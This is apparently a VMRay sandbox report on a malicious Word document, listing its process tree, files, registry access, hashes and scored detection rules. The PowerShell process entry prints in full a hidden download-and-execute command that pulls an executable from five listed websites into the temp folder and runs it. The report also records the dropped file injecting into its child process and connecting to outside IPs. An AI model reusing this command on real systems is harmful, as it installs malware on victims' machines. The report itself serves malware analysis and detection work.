VMRay Analyzer Report for Sample #1964137 (VMRay Analyzer 2.1.0)

PROCESS TREE

Process 1: winword.exe (PID 2420, parent PID 1172)
  Command line: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE"
  Working directory: C:\Users\hJrD1KOKY DS8lUjv\Desktop\
  Image path: c:\program files (x86)\microsoft office\root\office16\winword.exe

Process 2: powershell.exe (PID 2708, parent PID 2420; Child_Of Process 1)
  Command line: powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
  Working directory: C:\Users\hJrD1KOKY DS8lUjv\Desktop\
  Image path: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
  Operations logged: a long run of Created entries with a single Deleted entry among them (the report lists only the operation type, not the object)

Process 3: 8162.exe (PID 2976, parent PID 2708; Child_Of Process 2)
  Command line: "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
  Working directory: C:\Users\hJrD1KOKY DS8lUjv\Desktop\
  Image path: c:\users\hjrd1k~1\appdata\local\temp\8162.exe
  Operations logged: Created (5)

Process 4: 8162.exe (PID 2996, parent PID 2976; Child_Of Process 3)
  Command line: "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
  Working directory: C:\Users\hJrD1KOKY DS8lUjv\Desktop\
  Image path: c:\users\hjrd1k~1\appdata\local\temp\8162.exe
  Operations logged: Created (4)

FILES

  File: STD_INPUT_HANDLE
  File: STD_OUTPUT_HANDLE
  File: conout$
  File: c:\windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml (ps1xml)
  File: c:\windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml (ps1xml)
  File: c:\windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml (ps1xml)
  File: c:\windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml (ps1xml)
  File: c:\windows\syswow64\windowspowershell\v1.0\help.format.ps1xml (ps1xml)
  File: c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config (config)
  File: c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe (exe)
  File: System Paging File
  File: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (exe)
  File: STD_ERROR_HANDLE
  File: C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe (exe)

MUTEX

  Mutex: (name not preserved in this report; see the vmray_install_ipc_endpoint rule match below)

REGISTRY KEYS ACCESSED (duplicate entries collapsed; the EventLog subkey set was enumerated four times)

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog
  HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell
  HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1
  HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine
  HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
  HKEY_CURRENT_USER\Environment
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
  HKEY_CURRENT_USER (root key)
  HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

ANALYZED SAMPLE #1964137

  Sample-ID: #1964137
  Job-ID: #10166575
  Analyzed by: VMRay Analyzer 2.1.0 on a Windows 7 system
  VTI Score: 100 (based on VTI Database Version 2.6)

Metadata of Sample File #1964137
  Submission-ID: #2791464
  File name: C:\Users\hJrD1KOKY DS8lUjv\Desktop\dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78.doc
  File type: doc
  MD5: 36ca9cea3648ef3da53f4b84fe9f6120
  SHA1: 10448125e344fb33a3a8ac10b2295abe02dc01b9
  SHA256: dc39a7c3de4a13ca1ddd43b16f161430a017d82d347bb06e622ac246d301ff78
  Relation: Opened_By

Metadata of Analysis for Job-ID #10166575
  Timeout: False
  Platform: x86 64-bit
  VM image: win7_64_sp1-mso2016
  Unlabeled flag: True
  Operating system: Windows 7 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
  Unlabeled value: 189.125 (presumably the analysis duration in seconds; the report gives no unit)
  Note: this is a property collection for additional information of the VMRay analysis

VTI RULE MATCHES (category, score, rule, description, action)

  Network, 3/5, vmray_request_dns_by_name: Resolve "carbeyondstore.com". (Perform DNS request)
  Network, 3/5, vmray_request_dns_by_name: Resolve "www.carbeyondstore.com". (Perform DNS request)
  Process, 4/5, vmray_document_create_process: Create process "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe". (Create process)
  Network, 3/5, vmray_request_dns_by_name: Resolve "pxpgraphics.com". (Perform DNS request)
  Process, 1/5, vmray_install_ipc_endpoint: Create mutex with name "Global\.net clr networking". (Create system object)
  Process, 4/5, vmray_read_from_remote_process: "c:\users\hjrd1k~1\appdata\local\temp\8162.exe" reads from "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe". (Read from memory of another process)
  File System, 4/5, vmray_handle_with_malicious_files: File "c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe" is a known malicious file. (Handle with malicious files)
  Injection, 5/5, vmray_modify_memory_system: "c:\users\hjrd1k~1\appdata\local\temp\8162.exe" modifies memory of "c:\users\hjrd1k~1\appdata\local\temp\8162.exe". (Write into memory of another process)
  Injection, 5/5, vmray_modify_control_flow_system: "c:\users\hjrd1k~1\appdata\local\temp\8162.exe" alters context of "c:\users\hjrd1k~1\appdata\local\temp\8162.exe". (Modify control flow of another process)
  Network, 3/5, vmray_tcp_out_connection: Outgoing TCP connection to host "72.52.246.64:80". (Connect to remote host)
  Network, 3/5, vmray_tcp_out_connection: Outgoing TCP connection to host "69.65.3.206:80". (Connect to remote host)
  PE, 2/5, vmray_drop_pe_file: Drop file "c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe". (Drop PE file)
  PE, 3/5, vmray_execute_dropped_pe_file: Execute dropped file "c:\users\hjrd1koky ds8lujv\appdata\local\temp\8162.exe". (Execute dropped PE file)
  VBA Macro, 1/5, vmray_execute_macro_on_ws_event: Execute macro on "Activate Workbook" event. (Execute macro on specific worksheet event)
  VBA Macro, 2/5, vmray_execute_application: Shell WkBDLdsmW, IDI5UPj (Execute application)